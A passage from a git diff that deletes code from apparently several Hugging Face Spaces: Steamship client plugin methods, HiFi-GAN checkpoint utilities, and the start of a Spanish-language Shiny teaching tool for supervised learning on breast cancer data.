the default is `package_handle`. - """ - - if instance_handle is None: - if config is None: - instance_handle = package_handle - else: - instance_handle = f"{package_handle}-{hash_dict(config)}" - - return PackageInstance.create( - self, - package_handle=package_handle, - package_version_handle=version, - handle=instance_handle, - config=config, - fetch_if_exists=fetch_if_exists, - ) - - @staticmethod - def use_plugin( - plugin_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: bool = True, - workspace_handle: Optional[str] = None, - **kwargs, - ) -> PluginInstance: - """Creates/loads an instance of plugin `plugin_handle`. - - The instance is named `instance_handle` and located in the Workspace named `instance_handle`. - If no `instance_handle` is provided, the default is `plugin_handle`. 
- - For example, one may write the following to always get back the same plugin instance, no matter how many - times you run it, scoped into its own workspace: - - ```python - instance = Steamship.use_plugin('plugin-handle', 'instance-handle') - ``` - - One may also write: - - ```python - instance = Steamship.use('plugin-handle') # Instance will also be named `plugin-handle` - ``` - """ - if instance_handle is None: - instance_handle = plugin_handle - kwargs["workspace"] = workspace_handle or instance_handle - client = Steamship(**kwargs) - return client._instance_use_plugin( - plugin_handle=plugin_handle, - instance_handle=instance_handle, - config=config, - version=version, - fetch_if_exists=fetch_if_exists, - ) - - def use_skill( - self, - skill: Skill, - provider: Optional[Vendor] = None, - instance_handle: Optional[str] = None, - fetch_if_exists: Optional[bool] = True, - ) -> PluginInstance: - - if skill not in SKILL_TO_PROVIDER: - raise SteamshipError( - f"Unsupported skill provided. " - f"Use one of our supported skills: {','.join(SKILL_TO_PROVIDER)}" - ) - - if provider and provider not in SKILL_TO_PROVIDER[skill]: - raise SteamshipError( - f"The provider {provider} has no support for the skill {skill}." - f"Use one of the providers that support your skill: " - f"{','.join(SKILL_TO_PROVIDER[skill])}" - ) - - plugin_setup = ( - SKILL_TO_PROVIDER[skill][provider] - if provider - else list(SKILL_TO_PROVIDER[skill].values())[0] - ) - return self._instance_use_plugin( - plugin_handle=plugin_setup["plugin_handle"], - instance_handle=instance_handle, - config=plugin_setup["config"], - fetch_if_exists=fetch_if_exists, - ) - - def _instance_use_plugin( - self, - plugin_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: Optional[bool] = True, - ) -> PluginInstance: - """Creates/loads an instance of plugin `plugin_handle`. - - The instance is named `instance_handle` and located in the workspace this client is anchored to. - If no `instance_handle` is provided, the default is `plugin_handle`. - """ - - if instance_handle is None: - if config is None: - instance_handle = plugin_handle - else: - instance_handle = f"{plugin_handle}-{hash_dict(config)}" - - if plugin_handle in Steamship._PLUGIN_INSTANCE_SUBCLASS_OVERRIDES: - return Steamship._PLUGIN_INSTANCE_SUBCLASS_OVERRIDES[plugin_handle].create( - self, - plugin_handle=plugin_handle, - plugin_version_handle=version, - handle=instance_handle, - config=config, - fetch_if_exists=fetch_if_exists, - ) - - return PluginInstance.create( - self, - plugin_handle=plugin_handle, - plugin_version_handle=version, - handle=instance_handle, - config=config, - fetch_if_exists=fetch_if_exists, - ) - - def get_workspace(self) -> Workspace: - # We should probably add a hard-coded way to get this. The client in a Steamship Plugin/App comes - # pre-configured with an API key and the Workspace in which this client should be operating. - # This is a way to load the model object for that workspace. 
- logging.info( - f"get_workspace() called on client with config workspace {self.config.workspace_handle}/{self.config.workspace_id}" - ) - workspace = Workspace.get( - self, id_=self.config.workspace_id, handle=self.config.workspace_handle - ) - if not workspace: - logging.error("Unable to get workspace.") - raise SteamshipError( - message="Error while retrieving the Workspace associated with this client config.", - internal_message=f"workspace_id={self.config.workspace_id} workspace_handle={self.config.workspace_handle}", - ) - logging.info(f"Got workspace: {workspace.handle}/{workspace.id}") - return workspace diff --git a/spaces/JeffJing/ZookChatBot/steamship/data/package/__init__.py b/spaces/JeffJing/ZookChatBot/steamship/data/package/__init__.py deleted file mode 100644 index 8bffdef4441ff2a0f38bd576ad8af41447879dd7..0000000000000000000000000000000000000000 --- a/spaces/JeffJing/ZookChatBot/steamship/data/package/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -from .package import Package -from .package_instance import PackageInstance -from .package_version import PackageVersion - -__all__ = [ - "Package", - "PackageInstance", - "PackageVersion", -] diff --git a/spaces/Jikiwi/sovits-models/vdecoder/hifigan/utils.py b/spaces/Jikiwi/sovits-models/vdecoder/hifigan/utils.py deleted file mode 100644 index 9c93c996d3cc73c30d71c1fc47056e4230f35c0f..0000000000000000000000000000000000000000 --- a/spaces/Jikiwi/sovits-models/vdecoder/hifigan/utils.py +++ /dev/null @@ -1,68 +0,0 @@ -import glob -import os -import matplotlib -import torch -from torch.nn.utils import weight_norm -# matplotlib.use("Agg") -import matplotlib.pylab as plt - - -def plot_spectrogram(spectrogram): - fig, ax = plt.subplots(figsize=(10, 2)) - im = ax.imshow(spectrogram, aspect="auto", origin="lower", - interpolation='none') - plt.colorbar(im, ax=ax) - - fig.canvas.draw() - plt.close() - - return fig - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def apply_weight_norm(m): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - weight_norm(m) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def load_checkpoint(filepath, device): - assert os.path.isfile(filepath) - print("Loading '{}'".format(filepath)) - checkpoint_dict = torch.load(filepath, map_location=device) - print("Complete.") - return checkpoint_dict - - -def save_checkpoint(filepath, obj): - print("Saving checkpoint to {}".format(filepath)) - torch.save(obj, filepath) - print("Complete.") - - -def del_old_checkpoints(cp_dir, prefix, n_models=2): - pattern = os.path.join(cp_dir, prefix + '????????') - cp_list = glob.glob(pattern) # get checkpoint paths - cp_list = sorted(cp_list)# sort by iter - if len(cp_list) > n_models: # if more than n_models models are found - for cp in cp_list[:-n_models]:# delete the oldest models other than lastest n_models - open(cp, 'w').close()# empty file contents - os.unlink(cp)# delete file (move to trash when using Colab) - - -def scan_checkpoint(cp_dir, prefix): - pattern = os.path.join(cp_dir, prefix + '????????') - cp_list = glob.glob(pattern) - if len(cp_list) == 0: - return None - return sorted(cp_list)[-1] - diff --git a/spaces/Jorgerv97/Herramienta_interactiva_ensenyanza_tecnicas_aprendizaje_supervisado_salud/learningTool.py b/spaces/Jorgerv97/Herramienta_interactiva_ensenyanza_tecnicas_aprendizaje_supervisado_salud/learningTool.py deleted file mode 100644 
index 6a94413b6c9cfe63ecc1d7f97d3b993821947c78..0000000000000000000000000000000000000000 --- a/spaces/Jorgerv97/Herramienta_interactiva_ensenyanza_tecnicas_aprendizaje_supervisado_salud/learningTool.py +++ /dev/null @@ -1,2774 +0,0 @@ -from shiny import reactive, render, ui, module -from shinywidgets import output_widget, render_widget - -import plotly.graph_objects as go -import plotly.express as px -from plotly.subplots import make_subplots - -from pathlib import Path -from PIL import Image - -import numpy as np -import pandas as pd -import math as math -import re -import matplotlib.pyplot as plt - -# Importar los algoritmos y modelss desde scikit learn: -from sklearn.model_selection import train_test_split -from sklearn.tree import DecisionTreeClassifier, plot_tree -from sklearn.ensemble import RandomForestClassifier -from sklearn.linear_model import LogisticRegression -from sklearn import metrics - -# Importar todos los paquetes de información, ui y warnings generados -from GeneralInfo.presentation import presentation_ui, presentation_server -from GeneralInfo.initialData import initial_data_1_ui, initial_data_2_ui -from GeneralInfo.observation import observation_1_ui -from GeneralInfo.cleaning import cleaning_1_ui, cleaning_2_ui, cleaning_extra_ui, cleaning_server -from GeneralInfo.correlation import correlation_1_ui, correlation_2_ui, correlation_server -from GeneralInfo.subsetSplit import subsetSplit_1_ui, subsetSplit_2_ui, subsetSplit_server - -from AlgorithmsInfo.decTreeInfo import decTree_def_ui, decTree_howTo_ui, decTree_performance_ui, decTree_server -from AlgorithmsInfo.sharedInfo import shared_varImp_ui, shared_conf_mat_metrics_ui, shared_fitting_ui, shared_tree_rep_info_ui, shared_algs_server -from AlgorithmsInfo.ranForestInfo import ranForest_def_ui, ranForest_howTo_ui, ranForest_performance_ui, ranForest_server -from AlgorithmsInfo.logRegInfo import logReg_def_ui, logReg_howTo_ui, logReg_performance_ui, logReg_server - -from UIMessages.warningsGeneral import correlation_warning_ui, warnings_general_server -from UIMessages.warningsAlgorithms import diagnosis_warning_ui, test_split_warning_ui, test_split_low_warning_ui, test_split_high_warning_ui, features_warning_ui, feat_imp_warning_ui, conf_matrix_warning_ui, warnings_algorithms_server - - - -################################## DATAFRAMES Y DICCIONARIOS ################################# - -# Datos del dataframe de Breast Cancer Data Winsconsin -infile = Path(__file__).parent / "data.csv" -original_df = pd.read_csv( infile ) -clean_df = original_df.copy() - -empty_column_dict = {} -all_column_dict = {} -for col in clean_df.columns: - if col != "diagnosis": - all_column_dict[col] = col -outcome_var='diagnosis' - -# Datos para Decision tree -dec_tree_feat_imp_df = pd.DataFrame() - -# Datos para Random Forest -ran_forest_feat_imp_df = pd.DataFrame() - -# Datos para Logistic regression -log_reg_feat_imp_df = pd.DataFrame() - -# Variable para visualizar subplots -subplot_cols_number = 4 - -# Paths para guardado de imágenes -decTree_image_folder = Path(Path(__file__).parent / 'DecTrees') -ranForest_image_folder = Path(Path(__file__).parent / 'RanForests') - - -############################################################################################## -############################################################################################## -####################################### MÓDULO DE UI ######################################### 
-############################################################################################## -############################################################################################## - -@module.ui -def learningTool_ui(): - return ui.div( - ui.panel_main( -############################# TÍTULO - PRESENTACIÓN ########################### - ui.panel_main( - {"id": "tool-intro"}, - ui.tags.h1("PRESENTACIÓN A LA HERRAMIENTA"), - presentation_ui("Presentation_Main"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - -#################################### DATOS INICIALES ########################### - ui.panel_main( - ui.tags.h3("NUESTROS DATOS"), - initial_data_1_ui("initial_data_1"), - width=12 - ), - ui.panel_main( - {"id": "original-table"}, - ui.div( - ui.input_switch("view_original_table", "¡Ver los datos originales!", width="50%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "original-table-types"}, - initial_data_2_ui("initial_data_2"), - ui.div( - ui.input_switch("view_original_table_types", "¡Ver los tipos de los datos originales!", width="50%"), - style="font-weight: bold;" - ), - width=12, style="padding-top:20px;" - ), - ui.panel_main( - ui.tags.hr(), - width=12, style="padding-top:10px;" - ), - -#################################### OBSERVACIÓN DE DATOS ########################### - ui.panel_main( - ui.tags.h3("OBSERVACIÓN DE DATOS"), - observation_1_ui("observation_1"), - width=12 - ), - ui.panel_main( - {"id": "data-observation-diagnosis"}, - ui.div( - ui.input_switch("view_diganosis_hist", "¡Ver la distribución de los datos según la variable diagnosis!", width="50%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:10px;"), - width=12 - ), - ui.panel_main( - {"id": "data-observation-general"}, - ui.input_select("dropKeyWordSelector", "Selecciona un grupo de características según su tipo de medida:", {"mean": "Grupo de medida de media (mean)", "worst": "Grupo de medida de peor/mayor (worst)", "se": "Grupo de medida de error estándar (se)"}, width="50%"), - ui.div( - ui.input_switch("view_general_hist", "¡Ver el grupo de características seleccionado en función de la variable de diagnosis!", width="70%"), - style="font-weight: bold;" - ), - width=12, - ), - ui.panel_main( - ui.tags.hr(), - width=12, style="padding-top:10px;" - ), - -#################################### LIMPIEZA DE DATOS ########################### - ui.panel_main( - ui.tags.h3("LIMPIEZA DE DATOS"), - cleaning_1_ui("cleaning_1"), - width=12 - ), - ui.panel_main( - {"id": "clean-convert-diagnosis"}, - ui.input_action_button("convert_diagnosis", "Transformar datos de la variable diagnosis"), - cleaning_2_ui("cleaning_2"), - ui.input_select("dropIdSelector", "Selecciona la columna a eliminar:", all_column_dict, width="40%"), - width=12 - ), - ui.panel_main( - {"id": "clean-drop-index"}, - ui.input_action_button("drop_selected_column_clean", "Eliminar columna seleccionada"), - width=12 - ), - ui.panel_main( - {"id": "clean-table"}, - ui.tags.p("Por último, podemos observar como han quedado nuestros datos tras realizar la limpieza." 
- , style="padding-right:50px; padding-top:20px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("view_clean_table", "¡Ver los datos limpios!", width="50%"), - style="font-weight: bold;" - ), - width=12, style="padding-top:30px;" - ), - ui.panel_main( - cleaning_extra_ui("cleaning_extra"), - width=12, style="padding-top:10px;" - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - -#################################### CORRELACIÓN ########################### - ui.panel_main( - correlation_1_ui("correlation_1"), - width=12 - ), - ui.panel_main( - correlation_2_ui("correlation_2"), - width=12 - ), - ui.panel_main( - {"id": "correlation"}, - ui.input_slider("maximum_correlation", "Máxima correlación:", min=0, max=1, value=0.7, step=0.01), - ui.input_action_button("drop_correlation", "Eliminar columnas con correlación superior a la seleccionada"), - ui.tags.p(style="padding-top:20px;"), - ui.div( - ui.input_switch("view_correlation", "¡Ver la correlación entre datos!", width="50%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - ui.tags.hr(), - width=12, style="padding-top:10px;" - ), - - -#################################### TABS DE ALGORITMOS ########################### - ui.panel_main( - ui.tags.h3("ALGORITMOS DE PREDICCIÓN"), - width=12, style="padding-bottom:10px;" - ), - ui.panel_main( - ui.tags.h5("División de los datos en conjuntos de entrenamiento y prueba"), - subsetSplit_1_ui("subset_1"), - width=12, - ), - ui.panel_main( - {"id": "test_split"}, - subsetSplit_2_ui("subset_2"), - ui.input_slider("test_split_value", "Tamaño del subconjunto de prueba:", min=0, max=1, value=0.2, step=0.01), - ui.input_action_button("make_test_split", "Divide los datos en subconjunto de entrenamiento y testeo"), - ui.tags.p("", style="padding-bottom:30px;"), - ui.tags.hr(), - width=12, style="padding-bottom:10px;" - ), - ui.navset_tab( - ############################################################## - ################ ÁRBOL DE DECISIÓN ########################### - ############################################################## - ui.nav( - "Árbol de decisión", - ui.tags.h3("Árbol de decisión", style="padding-top:20px;"), - ui.panel_main( - ui.tags.h5("¿Qué es un arbol de decisión?", style="padding-top:20px; padding-bottom:10px;"), - decTree_def_ui("decTree_1"), - width=12 - ), - ui.panel_main( - decTree_howTo_ui("decTree_1"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - width=12 - ), - ######### AD: AJUSTES, CARACTERÍSTICAS Y CREACIÓN ######### - ui.row( - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Ajustes:"), - ui.tags.hr(), - ui.input_select("dec_tree_criterion","Criterion", {"gini": "Gini (default)", "entropy": "Entropy", "log_loss": "Log_loss"}), - ui.input_select("dec_tree_splitter","Splitter", {"best": "Best (default)", "random": "Random"}), - ui.input_slider("dec_tree_max_depth", "Max Depth (0 = None / default)", 0, 32, 0, step=1), - ui.input_slider("dec_tree_min_samples_split", "Min samples split (default = 2)", 1, 6, 2, step=1), - ui.input_slider("dec_tree_min_samples_leaf", "Min samples leaf (default = 1)", 1, 5, 1, step=1), - ui.input_select("dec_tree_max_features","Max features", {"None": "None (default)", "sqrt": "Sqrt", "log2": "Log2"}), - ), - ), - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Características:"), - ui.tags.hr(), - ui.input_checkbox_group("dec_tree_features_sel", "", choices=all_column_dict, selected=list(all_column_dict)), - ), - ), - 
ui.column( - 6, - ui.panel_main( - {"id": "dec_tree_generator"}, - ui.tags.h5("¡Crea el modelo de predicción!", style="padding-bottom:10px;"), - ui.input_action_button("generate_decission_tree", "Generar el modelo de árbol de decisión"), - width=12 - ), - ui.panel_main( - {"id": "var_imp_dec_tree"}, - ui.tags.hr(), - ui.tags.h5("Importancia de las características para el modelo:"), - shared_varImp_ui("decTree_shared_1"), - ui.div( - ui.input_switch("view_variable_importance_dec_tree", "¡Ver la importancia de las características!", width="80%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "var_imp_slider_dec_tree"}, - ui.input_slider("minimum_importance_dec_tree", "Mínima importancia:", min=0, max=100, value=5.0, step=0.1), - ui.input_action_button("deselect_not_imp_vars_dec_tree", "Deseleccionar características poco importantes automáticamente"), - width=12 - ), - ), - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ######### AD: MATRIZ DE CONFUSIÓN ######### - ui.panel_main( - ui.tags.h5("Resultados del modelo: matriz de confusión y métricas básicas"), - shared_conf_mat_metrics_ui("decTree_shared_1", label="decTree"), - width=12 - ), - ui.panel_main( - {"id": "dec_tree_conf_matrix"}, - ui.tags.p("Puedes ver las matrices de confusión del modelo generado y sus métricas aquí:" - , style="padding-top:20px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("conf_mat_dec_tree_switch", "¡Ver la matriz de confusión del árbol de decisión generado!", width="60%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.row( - ui.column(6, - ui.panel_main( - {"id": "dec_tree_conf_matrix_train"}, - width=12 - ), - ), - ui.column(6, - ui.panel_main( - {"id": "dec_tree_conf_matrix_test"}, - width=12 - ), - ), - ), - ######### AD: RESULTADOS CON ENTRENAMIENTO Y TEST ######### - ui.row( - ui.column(6, - ui.tags.p("Resultados con los datos de entrenamiento:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("decision_tree_precision"), - ui.output_text_verbatim("decision_tree_recall"), - ui.output_text_verbatim("decision_tree_f1"), - ui.output_text_verbatim("decision_tree_accuracy"), - width=7 - ), - ), - ui.column(6, - ui.tags.p("Resultados con los datos de prueba:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("decision_tree_precision_test"), - ui.output_text_verbatim("decision_tree_recall_test"), - ui.output_text_verbatim("decision_tree_f1_test"), - ui.output_text_verbatim("decision_tree_accuracy_test"), - width=7 - ), - ), - style="padding-top:30px;" - ), - decTree_performance_ui("decTree_3"), - ui.panel_main( - shared_fitting_ui("decTree_shared_1", label="decTree"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ########## AD: REPRESENTACIÓN ÁRBOL ########## - ui.panel_main( - {"id": "dec_tree_view"}, - ui.tags.h5("Representación del árbol de decisión"), - ui.tags.p("Finalmente podemos ver la representación del árbol de decisión. Gracias a ella podemos ver como nuestro modelo elige si una instancia pertenece a una clase o a otra." 
- , style="padding-top:10px; padding-bottom:10px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("view_tree_dec_tree_switch", "¡Ver la representación del árbol de decisión generado!", width="60%"), - style="font-weight: bold;" - ), - width=12, style="padding-bottom:10px;" - ), - ui.panel_main( - shared_tree_rep_info_ui("decTree_shared_1", label="decTree"), - width=12, style="padding-bottom:40px;" - ), - ), - ############################################################## - ################ RANDOM FOREST ############################### - ############################################################## - ui.nav("Bosque aleatorio", - ui.tags.h3("Bosque aleatorio", style="padding-top:20px;"), - ui.panel_main( - ui.tags.h5("¿Qué es un bosque aleatorio?", style="padding-top:20px; padding-bottom:10px;"), - ranForest_def_ui("ranForest_1"), - width=12 - ), - ui.panel_main( - ranForest_howTo_ui("ranForest_1"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - width=12 - ), - ######### RF: AJUSTES, CARACTERÍSTICAS Y CREACIÓN ######### - ui.row( - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Ajustes:"), - ui.tags.hr(), - ui.input_slider("ran_forest_n_estimators", "Num Estimators (default = 100)", 1, 100, 10, step=1), - ui.input_select("ran_forest_criterion","Criterion", {"gini": "Gini (default)", "entropy": "Entropy", "log_loss": "Log_loss"}), - ui.input_slider("ran_forest_max_depth", "Max Depth (0 = None / default)", 0, 32, 0, step=1), - ui.input_slider("ran_forest_min_samples_split", "Min samples split (default = 2)", 1, 6, 2, step=1), - ui.input_slider("ran_forest_min_samples_leaf", "Min samples leaf (default = 1)", 1, 5, 1, step=1), - ui.input_select("ran_forest_max_features","Max features", {"None": "None (default)", "sqrt": "Sqrt", "log2": "Log2"}), - ), - ), - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Características:"), - ui.tags.hr(), - ui.input_checkbox_group("ran_forest_features_sel", "", choices=all_column_dict, selected=list(all_column_dict)), - ), - ), - ui.column( - 6, - ui.panel_main( - {"id": "ran_forest_generator"}, - ui.tags.h5("¡Crea el modelo de predicción!"), - ui.input_action_button("generate_random_forest", "Generar el modelo de bosque aleatorio"), - width=12 - ), - ui.panel_main( - {"id": "var_imp_ran_forest"}, - ui.tags.hr(), - ui.tags.h5("Importancia de las características para el modelo:"), - shared_varImp_ui("ranForest_shared_1"), - ui.div( - ui.input_switch("view_variable_importance_ran_forest", "¡Ver la importancia de las características!", width="80%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "var_imp_slider_ran_forest"}, - ui.input_slider("minimum_importance_ran_forest", "Mínima importancia:", min=0, max=100, value=5.0, step=0.1), - ui.input_action_button("deselect_not_imp_vars_ran_forest", "Deseleccionar características poco importantes automaticamente!"), - width=12 - ), - ), - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ######### RF: MATRIZ DE CONFUSIÓN ######### - ui.panel_main( - ui.tags.h5("Resultados del modelo: matriz de confusión y métricas básicas"), - shared_conf_mat_metrics_ui("ranForest_shared_1", label="ranForest"), - width=12 - ), - ui.panel_main( - {"id": "ran_forest_conf_matrix"}, - ui.tags.p("Puedes ver las matrices de confusión del modelo generado y sus métricas aquí:" - , style="padding-top:20px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - 
ui.input_switch("conf_mat_ran_forest_switch", "¡Ver la matriz de confusión del bosque aleatorio generado!", width="60%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.row( - ui.column(6, - ui.panel_main( - {"id": "ran_forest_conf_matrix_train"}, - width=12 - ), - ), - ui.column(6, - ui.panel_main( - {"id": "ran_forest_conf_matrix_test"}, - width=12 - ), - ), - ), - ######### RF: RESULTADOS CON ENTRENAMIENTO Y TEST ######### - ui.row( - ui.column(6, - ui.tags.p("Resultados con los datos de entrenamiento:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("random_forest_precision"), - ui.output_text_verbatim("random_forest_recall"), - ui.output_text_verbatim("random_forest_f1"), - ui.output_text_verbatim("random_forest_accuracy"), - width=7 - ), - ), - ui.column(6, - ui.tags.p("Resultados con los datos de prueba:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("random_forest_precision_test"), - ui.output_text_verbatim("random_forest_recall_test"), - ui.output_text_verbatim("random_forest_f1_test"), - ui.output_text_verbatim("random_forest_accuracy_test"), - width=7 - ), - ), - style="padding-top:30px;" - ), - ranForest_performance_ui("ranForest_3"), - ui.panel_main( - shared_fitting_ui("ranForest_shared_1", label="ranForest"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ########## RF: REPRESENTACIÓN ÁRBOL ########## - ui.panel_main( - {"id": "ran_forest_view"}, - ui.tags.h5("Representación de los árboles"), - ui.tags.p("Un bosque aleatorio está formado por múltiples árboles de decisión. A continuación puedes ver los 5 primeros como máximo."), - ui.input_select("view_tree_ran_forest_number", "Selecciona el árbol que quieres mostrar", empty_column_dict), - ui.div( - ui.input_switch("view_tree_ran_forest_switch", "¡Ver la representación de los árboles de decisión generados!", width="60%"), - style="font-weight: bold;" - ), - width=12, style="padding-bottom:10px;" - ), - ui.panel_main( - shared_tree_rep_info_ui("ranForest_shared_1", label="ranForest"), - width=12, style="padding-bottom:40px;" - ), - ), - ############################################################## - ################ REGRESIÓN LOGÍSTICA ######################### - ############################################################## - ui.nav("Regresión logística", - ui.tags.h3("Regresión logística", style="padding-top:20px;"), - ui.panel_main( - ui.tags.h5("¿Qué es una regresión logística?", style="padding-top:20px; padding-bottom:10px;"), - logReg_def_ui("logReg_1"), - width=12 - ), - ui.panel_main( - logReg_howTo_ui("logReg_1"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - width=12 - ), - ######### RL: AJUSTES, CARACTERÍSTICAS Y CREACIÓN ######### - ui.row( - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Ajustes:"), - ui.tags.hr(), - ui.input_select("log_reg_solver","Solver", {"lbfgs": "Lbfgs (default)", "liblinear": "Liblinear", "newton-cg": "Newton-cg", "newton-cholesky": "Newton-cholesky", "sag": "Sag", "saga": "Saga"}, selected="lbfgs"), - ui.input_select("log_reg_penalty","Penalty", {"l2": "L2 (default)", "None": "None"}, selected="l2"), - ui.input_slider("log_reg_tol", "Tolerance (default = 1e-4) - 1e(valor seleccionado)", -10, 0, -4, step=1), - ui.input_slider("log_reg_c", "C (default = 1)", 1, 3000, 1, step=1), - ui.input_slider("log_reg_max_iter", "Max iterations (default = 100)", 100, 5000, 100, step=10), - ), - ), - ui.column( - 3, - ui.panel_well( - 
ui.tags.h5("Características:"), - ui.tags.hr(), - ui.input_checkbox_group("log_reg_features_sel", "", choices=all_column_dict, selected=list(all_column_dict)), - ), - ), - ui.column( - 6, - ui.panel_main( - {"id": "log_reg_generator"}, - ui.tags.h5("¡Crea el modelo de predicción!"), - ui.input_action_button("generate_logistic_regression", "Generar el modelo de Regresión logística"), - width=12 - ), - ui.panel_main( - {"id": "var_imp_log_reg"}, - ui.tags.hr(), - ui.tags.h5("Importancia de las características para el modelo:"), - shared_varImp_ui("logReg_shared_1"), - ui.div( - ui.input_switch("view_variable_importance_log_reg", "¡Ver la importancia de las características!", width="80%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "var_imp_slider_log_reg"}, - ui.input_slider("minimum_importance_log_reg", "Mínima importancia:", min=0, max=100, value=5.0, step=0.1), - ui.input_action_button("deselect_not_imp_vars_log_reg", "Deseleccionar características poco importantes automaticamente"), - width=12 - ), - ), - ), - ui.panel_main( - ui.tags.p(style="padding-bottom: 20px"), - ui.tags.hr(), - width=12 - ), - ######### RL: MATRIZ DE CONFUSIÓN ######### - ui.panel_main( - ui.tags.h5("Resultados del modelo: matriz de confusión y métricas básicas"), - shared_conf_mat_metrics_ui("logReg_shared_1", label="logReg"), - width=12 - ), - ui.panel_main( - {"id": "log_reg_conf_matrix"}, - ui.tags.p("Puedes ver las matrices de confusión del modelo generado y sus métricas aquí:" - , style="padding-top:20px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("conf_mat_log_reg_switch", "¡Ver la matriz de confusión de la regresión logística generada!", width="60%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.row( - ui.column(6, - ui.panel_main( - {"id": "log_reg_conf_matrix_train"}, - width=12 - ), - ), - ui.column(6, - ui.panel_main( - {"id": "log_reg_conf_matrix_test"}, - width=12 - ), - ), - ), - ######### RL: RESULTADOS CON ENTRENAMIENTO Y TEST ######### - ui.row( - ui.column(6, - ui.tags.p("Resultados con los datos de entrenamiento:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("logistic_regression_precision"), - ui.output_text_verbatim("logistic_regression_recall"), - ui.output_text_verbatim("logistic_regression_f1"), - ui.output_text_verbatim("logistic_regression_accuracy"), - width=7 - ), - ), - ui.column(6, - ui.tags.p("Resultados con los datos de prueba:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("logistic_regression_precision_test"), - ui.output_text_verbatim("logistic_regression_recall_test"), - ui.output_text_verbatim("logistic_regression_f1_test"), - ui.output_text_verbatim("logistic_regression_accuracy_test"), - width=7 - ), - ), - style="padding-top:30px;" - ), - logReg_performance_ui("logReg_3"), - ui.panel_main( - shared_fitting_ui("logReg_shared_1", label="logReg"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:40px;"), - width=12 - ), - ), - ), - -####################### RESET DATAFRAME LIMPIA ############################# - ui.panel_main( - ui.tags.hr(), - ui.tags.h3("¿LA BASE DE DATOS LIMPIA YA NO SIRVE?", style="padding-top:10px;"), - ui.tags.p("Si has eliminado demasiadas columnas, te has equivocado o simplemente quieres volver a empezar... 
¡Restablece aquí la base de datos limpia!", style="padding-top:10px;"), - ui.input_action_button("reset_clean_df", "Restablece los datos limpios"), - width=12, style="padding-top:10px; padding-bottom:50px;" - ), - width=12 - ), - ) - - - -############################################################################################## -############################################################################################## -#################################### MÓDULO DE SERVIDOR ###################################### -############################################################################################## -############################################################################################## - -@module.server -def learningTool_server(input, output, session): - -################# VARIABLES REACTIVAS Y DE CONTROL DE LA HERRAMIENTA ######################### - - #Controles generales: - diagnosis_data_converted = reactive.Value(False) - correlation_execution_counter = reactive.Value(0) - test_split_done = reactive.Value(False) - reset_dataframe_counter = reactive.Value(0) - - #Decision Tree: - decision_tree_execution_counter = reactive.Value(0) - - accuracy_decTree = reactive.Value(-1) - recall_decTree = reactive.Value(-1) - precision_decTree = reactive.Value(-1) - f1_decTree = reactive.Value(-1) - - accuracy_decTree_test = reactive.Value(-1) - recall_decTree_test = reactive.Value(-1) - precision_decTree_test = reactive.Value(-1) - f1_decTree_test = reactive.Value(-1) - - tree_plot_x_coords = reactive.Value() - tree_plot_y_coords = reactive.Value() - tree_plot_texts = reactive.Value() - - tree_conf_mat_train = reactive.Value() - tree_conf_mat_test = reactive.Value() - - #Random Forest: - random_forest_execution_counter = reactive.Value(0) - random_forest_last_estimators_num = reactive.Value(0) - - accuracy_ranForest = reactive.Value(-1) - recall_ranForest = reactive.Value(-1) - precision_ranForest = reactive.Value(-1) - f1_ranForest = reactive.Value(-1) - - accuracy_ranForest_test = reactive.Value(-1) - recall_ranForest_test = reactive.Value(-1) - precision_ranForest_test = reactive.Value(-1) - f1_ranForest_test = reactive.Value(-1) - - 